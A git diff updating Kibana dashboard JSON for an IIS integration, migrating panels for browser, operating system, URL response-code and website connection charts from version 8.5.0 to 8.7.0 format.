"ff18c09c-1df1-41e9-9f42-d846a26dac01": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "user_agent.os.version: Descending", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "user_agent.os.version" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Browsers breakdown" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "9af5aff6-6430-485d-b606-faf9a2199a1e", + "w": 24, + "x": 24, + "y": 42 + }, + "panelIndex": "9af5aff6-6430-485d-b606-faf9a2199a1e", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-83c02141-7b27-4ae9-8c80-d251c18f5685", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "83c02141-7b27-4ae9-8c80-d251c18f5685": { + "columnOrder": [ + "0f4b2ec0-bf3f-44cf-b888-370cda0c46e6", + "ff18c09c-1df1-41e9-9f42-d846a26dac01", + "42cb9808-f556-4da5-a3d5-07e3d28a48dc" + ], + "columns": { + "0f4b2ec0-bf3f-44cf-b888-370cda0c46e6": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "user_agent.os.name: Descending", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "orderBy": { + "type": "custom" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "layers": [ - { - "categoryDisplay": "hide", - "layerId": "83c02141-7b27-4ae9-8c80-d251c18f5685", - "layerType": "data", - "legendDisplay": "show", - "metric": "42cb9808-f556-4da5-a3d5-07e3d28a48dc", - "nestedLegend": false, - "numberDisplay": "percent", - "primaryGroups": [ - "0f4b2ec0-bf3f-44cf-b888-370cda0c46e6", - "ff18c09c-1df1-41e9-9f42-d846a26dac01" - ] - } - ], - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "shape": "donut" - } + "size": 5 + }, + "scale": "ordinal", + "sourceField": "user_agent.os.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsPie" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "9af5aff6-6430-485d-b606-faf9a2199a1e", - "w": 24, - "x": 24, - "y": 42 + "42cb9808-f556-4da5-a3d5-07e3d28a48dc": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "ff18c09c-1df1-41e9-9f42-d846a26dac01": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "user_agent.os.version: Descending", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "orderBy": { + "type": "custom" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "user_agent.os.version" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "hide", + "layerId": "83c02141-7b27-4ae9-8c80-d251c18f5685", + "layerType": "data", + "legendDisplay": "show", + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "0f4b2ec0-bf3f-44cf-b888-370cda0c46e6", + "ff18c09c-1df1-41e9-9f42-d846a26dac01" + ], + "metrics": [ + "42cb9808-f556-4da5-a3d5-07e3d28a48dc" + ] + } + ], + "palette": { + "name": "kibana_palette", + "type": "palette" }, - "panelIndex": "9af5aff6-6430-485d-b606-faf9a2199a1e", - "title": "Operating systems breakdown", - "type": "lens", - "version": "8.5.0" + "shape": "donut" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-47ae5d42-07e3-4ac9-9ff8-9cec51f84c91", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "47ae5d42-07e3-4ac9-9ff8-9cec51f84c91": { - "columnOrder": [ - "89e93e71-74ba-4eeb-8388-e39e4009e3cf", - "75e08c2e-83f6-4f8b-999f-1aa7d1f44c17", - "49e2e550-a0cd-4e2f-9107-263de26bc41c" - ], - "columns": { - "49e2e550-a0cd-4e2f-9107-263de26bc41c": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "http.response.status_code: *" - }, - "isBucketed": false, - "label": "Count", - "operationType": "count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "___records___" - }, - "75e08c2e-83f6-4f8b-999f-1aa7d1f44c17": { - "dataType": "number", - "isBucketed": true, - "label": "Top 5 values of http.response.status_code", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "49e2e550-a0cd-4e2f-9107-263de26bc41c", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "http.response.status_code" - }, - "89e93e71-74ba-4eeb-8388-e39e4009e3cf": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "URLs", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "49e2e550-a0cd-4e2f-9107-263de26bc41c", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "url.path" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Operating systems breakdown" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "763a513d-7bdc-489f-8088-9ae32d65b5ca", + "w": 48, + "x": 0, + "y": 27 + }, + "panelIndex": "763a513d-7bdc-489f-8088-9ae32d65b5ca", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-47ae5d42-07e3-4ac9-9ff8-9cec51f84c91", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "47ae5d42-07e3-4ac9-9ff8-9cec51f84c91": { + "columnOrder": [ + "89e93e71-74ba-4eeb-8388-e39e4009e3cf", + "75e08c2e-83f6-4f8b-999f-1aa7d1f44c17", + "49e2e550-a0cd-4e2f-9107-263de26bc41c" + ], + "columns": { + "49e2e550-a0cd-4e2f-9107-263de26bc41c": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "http.response.status_code: *" + }, + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "75e08c2e-83f6-4f8b-999f-1aa7d1f44c17": { + "dataType": "number", + "isBucketed": true, + "label": "Top 5 values of http.response.status_code", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "49e2e550-a0cd-4e2f-9107-263de26bc41c", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "49e2e550-a0cd-4e2f-9107-263de26bc41c" - ], - "layerId": "47ae5d42-07e3-4ac9-9ff8-9cec51f84c91", - "layerType": "data", - "position": "top", - "seriesType": "bar_horizontal_stacked", - "showGridlines": false, - "splitAccessor": "75e08c2e-83f6-4f8b-999f-1aa7d1f44c17", - "xAccessor": "89e93e71-74ba-4eeb-8388-e39e4009e3cf", - "yConfig": [ - { - "axisMode": "left", - "forAccessor": "49e2e550-a0cd-4e2f-9107-263de26bc41c" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "right", - "showSingleSeries": true - }, - "preferredSeriesType": "bar_horizontal_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "URLs" - } + "size": 5 + }, + "scale": "ordinal", + "sourceField": "http.response.status_code" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "89e93e71-74ba-4eeb-8388-e39e4009e3cf": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "URLs", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "49e2e550-a0cd-4e2f-9107-263de26bc41c", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "url.path" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 15, - "i": "763a513d-7bdc-489f-8088-9ae32d65b5ca", - "w": 48, - "x": 0, - "y": 27 + "layers": [ + { + "accessors": [ + "49e2e550-a0cd-4e2f-9107-263de26bc41c" + ], + "layerId": "47ae5d42-07e3-4ac9-9ff8-9cec51f84c91", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal_stacked", + "showGridlines": false, + "splitAccessor": "75e08c2e-83f6-4f8b-999f-1aa7d1f44c17", + "xAccessor": "89e93e71-74ba-4eeb-8388-e39e4009e3cf", + "yConfig": [ + { + "axisMode": "left", + "forAccessor": "49e2e550-a0cd-4e2f-9107-263de26bc41c" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "right", + "showSingleSeries": true }, - "panelIndex": "763a513d-7bdc-489f-8088-9ae32d65b5ca", - "title": "Top URLs by response code", - "type": "lens", - "version": "8.5.0" - } - ], - "timeRestore": false, - "title": "[Logs IIS] Access and error logs", - "version": 1 - }, - "coreMigrationVersion": "8.5.0", - "id": "iis-4278ad30-fe16-11e7-a3b0-d13028918f9f", - "migrationVersion": { - "dashboard": "8.5.0" - }, - "references": [ - { - "id": "iis-0ac17980-e1d8-11ec-baf0-970634a1784d", - "name": "ec72819b-6985-4761-94ae-5d5fcc9e682a:panel_ec72819b-6985-4761-94ae-5d5fcc9e682a", - "type": "map" - }, - { - "id": "logs-*", - "name": "88dc28a3-1ff6-448c-aa64-06f954ea2e8f:indexpattern-datasource-layer-238d8224-43e0-4df5-9862-decc0b59c88e", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "1823acfd-eadf-42be-b208-773047e26dec:indexpattern-datasource-layer-ddb9c755-6e2e-4aa2-a0ad-47f5a3802700", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "ff2a5b50-3711-4db3-b189-0581ddba15f6:indexpattern-datasource-layer-fd149e1e-318c-4e85-b6d6-aea79fa8f331", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "9af5aff6-6430-485d-b606-faf9a2199a1e:indexpattern-datasource-layer-83c02141-7b27-4ae9-8c80-d251c18f5685", - "type": "index-pattern" + "preferredSeriesType": "bar_horizontal_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "xTitle": "URLs" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - { - "id": "logs-*", - "name": "763a513d-7bdc-489f-8088-9ae32d65b5ca:indexpattern-datasource-layer-47ae5d42-07e3-4ac9-9ff8-9cec51f84c91", - "type": "index-pattern" - } + "title": "Top URLs by response code" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Logs IIS] Access and error logs", + "version": 1 + }, + "references": [ + { + "id": "logs-*", + "name": "88dc28a3-1ff6-448c-aa64-06f954ea2e8f:indexpattern-datasource-layer-238d8224-43e0-4df5-9862-decc0b59c88e", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "1823acfd-eadf-42be-b208-773047e26dec:indexpattern-datasource-layer-ddb9c755-6e2e-4aa2-a0ad-47f5a3802700", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ff2a5b50-3711-4db3-b189-0581ddba15f6:indexpattern-datasource-layer-fd149e1e-318c-4e85-b6d6-aea79fa8f331", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9af5aff6-6430-485d-b606-faf9a2199a1e:indexpattern-datasource-layer-83c02141-7b27-4ae9-8c80-d251c18f5685", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "763a513d-7bdc-489f-8088-9ae32d65b5ca:indexpattern-datasource-layer-47ae5d42-07e3-4ac9-9ff8-9cec51f84c91", + "type": "index-pattern" + }, + { + "type": "index-pattern", + "name": "ec72819b-6985-4761-94ae-5d5fcc9e682a:layer_1_source_index_pattern", + "id": "logs-*" + } + ], + "managed": false } \ No newline at end of file diff --git a/packages/iis/kibana/dashboard/iis-4b975820-85a1-11ea-91bc-ab084c7ec0e7.json b/packages/iis/kibana/dashboard/iis-4b975820-85a1-11ea-91bc-ab084c7ec0e7.json index cd6743bb98c..47f145c5a44 100644 --- a/packages/iis/kibana/dashboard/iis-4b975820-85a1-11ea-91bc-ab084c7ec0e7.json +++ b/packages/iis/kibana/dashboard/iis-4b975820-85a1-11ea-91bc-ab084c7ec0e7.json @@ -1,2639 +1,2662 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "oneLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"1a1fa4d4-877e-44cb-ae33-ed1cdb800e99\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"iis.website.name\",\"title\":\"Website\",\"id\":\"1a1fa4d4-877e-44cb-ae33-ed1cdb800e99\",\"enhancements\":{}}}}" + "id": "iis-4b975820-85a1-11ea-91bc-ab084c7ec0e7", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.7.0" + }, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.7.0", + "updated_at": "2023-11-07T17:17:42.355Z", + "created_at": "2023-11-07T17:17:42.355Z", + "version": "WzEwNiwxXQ==", + "attributes": { + "controlGroupInput": { + "controlStyle": "oneLine", + "chainingSystem": "HIERARCHICAL", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"1a1fa4d4-877e-44cb-ae33-ed1cdb800e99\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"iis.website.name\",\"title\":\"Website\",\"id\":\"1a1fa4d4-877e-44cb-ae33-ed1cdb800e99\",\"enhancements\":{}}}}" + }, + "description": "This dashboard shows metrics for the websites running on IIS.", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "useMargins": true + }, + "panelsJSON": [ + { + "version": "8.7.0", + "type": "visualization", + "gridData": { + "h": 12, + "i": "7dffa44e-5ac7-46a6-9301-6952beedbee5", + "w": 9, + "x": 0, + "y": 0 }, - "description": "This dashboard shows metrics for the websites running on IIS.", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { + "panelIndex": "7dffa44e-5ac7-46a6-9301-6952beedbee5", + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { "filter": [], "query": { - "language": "kuery", - "query": "" + "language": "kuery", + "query": "" } - } + } + }, + "description": "", + "params": { + "fontSize": 10, + "markdown": "### IIS\n\n[Webserver](#/dashboard/iis-ebc23240-8572-11ea-91bc-ab084c7ec0e7)| [Webserver processes](#/dashboard/iis-2c171500-858b-11ea-91bc-ab084c7ec0e7) | [**Websites**](#/dashboard/iis-4b975820-85a1-11ea-91bc-ab084c7ec0e7) | [Application Pools](#/dashboard/iis-b4108810-861c-11ea-91bc-ab084c7ec0e7) \n\n\n\n", + "openLinksInNewTab": false + }, + "type": "markdown", + "uiState": {} + }, + "type": "visualization" }, - "optionsJSON": { - "hidePanelTitles": false, - "useMargins": true + "title": "Navigation Website Overview" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "d366a32e-1ed5-4089-82b4-e9e34b674c43", + "w": 13, + "x": 9, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "description": "", - "params": { - "fontSize": 10, - "markdown": "### IIS\n\n[Webserver](#/dashboard/iis-ebc23240-8572-11ea-91bc-ab084c7ec0e7)| [Webserver processes](#/dashboard/iis-2c171500-858b-11ea-91bc-ab084c7ec0e7) | [**Websites**](#/dashboard/iis-4b975820-85a1-11ea-91bc-ab084c7ec0e7) | [Application Pools](#/dashboard/iis-b4108810-861c-11ea-91bc-ab084c7ec0e7) \n\n\n\n", - "openLinksInNewTab": false + "panelIndex": "d366a32e-1ed5-4089-82b4-e9e34b674c43", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-ed85fb90-3616-4a1a-91e7-4baa6c2f0e6d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "ed85fb90-3616-4a1a-91e7-4baa6c2f0e6d": { + "columnOrder": [ + "7be25a00-f479-4413-ab6a-817744e0e070", + "8a0acddd-9a1d-4d55-ac1a-0687cb155d02" + ], + "columns": { + "7be25a00-f479-4413-ab6a-817744e0e070": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.website.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" + }, + "orderBy": { + "type": "custom" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.website.name" }, - "type": "markdown", - "uiState": {} + "8a0acddd-9a1d-4d55-ac1a-0687cb155d02": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "" + }, + "isBucketed": false, + "label": "Current Connections", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.website.network.current_connections" + } + }, + "incompleteColumns": {} } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": false + }, + "fillOpacity": 1.2, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": false + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "8a0acddd-9a1d-4d55-ac1a-0687cb155d02" + ], + "layerId": "ed85fb90-3616-4a1a-91e7-4baa6c2f0e6d", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "seriesType": "bar_horizontal", + "xAccessor": "7be25a00-f479-4413-ab6a-817744e0e070", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(104,188,0,1)", + "forAccessor": "8a0acddd-9a1d-4d55-ac1a-0687cb155d02" + } + ] + } + ], + "legend": { + "isVisible": false, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": false }, - "gridData": { - "h": 12, - "i": "7dffa44e-5ac7-46a6-9301-6952beedbee5", - "w": 9, - "x": 0, - "y": 0 - }, - "panelIndex": "7dffa44e-5ac7-46a6-9301-6952beedbee5", - "title": "Navigation Website Overview", - "type": "visualization", - "version": "8.5.0" + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": false + }, + "valueLabels": "show" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-ed85fb90-3616-4a1a-91e7-4baa6c2f0e6d", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "ed85fb90-3616-4a1a-91e7-4baa6c2f0e6d": { - "columnOrder": [ - "7be25a00-f479-4413-ab6a-817744e0e070", - "8a0acddd-9a1d-4d55-ac1a-0687cb155d02" - ], - "columns": { - "7be25a00-f479-4413-ab6a-817744e0e070": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.website.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.website.name" - }, - "8a0acddd-9a1d-4d55-ac1a-0687cb155d02": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "" - }, - "isBucketed": false, - "label": "Current Connections", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.website.network.current_connections" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Current Connections" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "ba537347-2422-4e09-931e-c0ff3ad24ca3", + "w": 13, + "x": 22, + "y": 0 + }, + "panelIndex": "ba537347-2422-4e09-931e-c0ff3ad24ca3", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-abcf6552-9150-4c04-9dfb-d5be10c7210a", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "abcf6552-9150-4c04-9dfb-d5be10c7210a": { + "columnOrder": [ + "32725ee9-9b18-4823-b660-266886bc1064", + "5838b61a-c214-4934-8c4b-de59fc13e6a0" + ], + "columns": { + "32725ee9-9b18-4823-b660-266886bc1064": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.website.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "5838b61a-c214-4934-8c4b-de59fc13e6a0", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": false - }, - "fillOpacity": 1.2, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": false - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "8a0acddd-9a1d-4d55-ac1a-0687cb155d02" - ], - "layerId": "ed85fb90-3616-4a1a-91e7-4baa6c2f0e6d", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "bar_horizontal", - "xAccessor": "7be25a00-f479-4413-ab6a-817744e0e070", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(104,188,0,1)", - "forAccessor": "8a0acddd-9a1d-4d55-ac1a-0687cb155d02" - } - ] - } - ], - "legend": { - "isVisible": false, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": false - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": false - }, - "valueLabels": "show" - } + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.website.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "5838b61a-c214-4934-8c4b-de59fc13e6a0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "" + }, + "isBucketed": false, + "label": "Maximum Connections", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.website.network.maximum_connections" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": false + }, + "fillOpacity": 1.2, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": false + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "5838b61a-c214-4934-8c4b-de59fc13e6a0" + ], + "layerId": "abcf6552-9150-4c04-9dfb-d5be10c7210a", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "d366a32e-1ed5-4089-82b4-e9e34b674c43", - "w": 13, - "x": 9, - "y": 0 - }, - "panelIndex": "d366a32e-1ed5-4089-82b4-e9e34b674c43", - "title": "Current Connections", - "type": "lens", - "version": "8.5.0" + "seriesType": "bar_horizontal", + "xAccessor": "32725ee9-9b18-4823-b660-266886bc1064", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(104,204,202,1)", + "forAccessor": "5838b61a-c214-4934-8c4b-de59fc13e6a0" + } + ] + } + ], + "legend": { + "isVisible": false, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": false + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": false + }, + "valueLabels": "show" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-abcf6552-9150-4c04-9dfb-d5be10c7210a", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "abcf6552-9150-4c04-9dfb-d5be10c7210a": { - "columnOrder": [ - "32725ee9-9b18-4823-b660-266886bc1064", - "5838b61a-c214-4934-8c4b-de59fc13e6a0" - ], - "columns": { - "32725ee9-9b18-4823-b660-266886bc1064": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.website.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "5838b61a-c214-4934-8c4b-de59fc13e6a0", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.website.name" - }, - "5838b61a-c214-4934-8c4b-de59fc13e6a0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "" - }, - "isBucketed": false, - "label": "Maximum Connections", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.website.network.maximum_connections" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Maximum Connections" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "3ca8af17-0bbf-4697-a193-6f0db4bfeeb8", + "w": 13, + "x": 35, + "y": 0 + }, + "panelIndex": "3ca8af17-0bbf-4697-a193-6f0db4bfeeb8", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-81b4a03a-853e-48cb-b24e-c468ed7e9567", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "81b4a03a-853e-48cb-b24e-c468ed7e9567": { + "columnOrder": [ + "0a04ece1-2036-410c-834e-11b02d1d4bd1", + "2d2eb68a-2e48-48b5-9059-b5f8d99b6f90" + ], + "columns": { + "0a04ece1-2036-410c-834e-11b02d1d4bd1": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.website.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderBy": { + 